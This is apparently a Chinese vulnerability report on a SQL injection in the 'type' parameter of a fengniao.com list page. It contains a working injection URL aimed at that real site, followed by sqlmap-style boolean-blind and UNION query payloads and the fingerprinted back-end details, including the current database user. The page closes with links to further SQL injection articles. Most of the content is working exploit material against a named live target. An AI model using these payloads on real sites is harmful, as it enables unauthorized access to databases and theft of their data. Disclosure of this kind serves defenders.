code 区域 http://www.fengniao.com/active/20100415_zhuyi/list.php?type=-1%20OR%20length(database())=8%20AND%20000544%3d000544%20--%20 漏洞证明： code 区域 --- Parameter: type (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: type=1 AND 3170=3170 Type: UNION query Title: MySQL UNION query (88) - 2 columns Payload: type=1 UNION ALL SELECT 88,CONCAT(0x716a6b7871,0x72774766587364425077,0x716b787671)# --- web application technology: Nginx back-end DBMS: MySQL 5 current user: '[email protected]%' […]

您可能也喜欢：
ThinkSNS 防御绕过思路(union select 真正的无限制sql注射)	Union查询SQL注入测试	新浪的一个Sql注射已进入后台	Sql脚本注射技巧整理大全	企成汽车配件网站管理系统SqL注入漏洞 Enterprises into auto parts site management system SqL injection vulnerability
无觅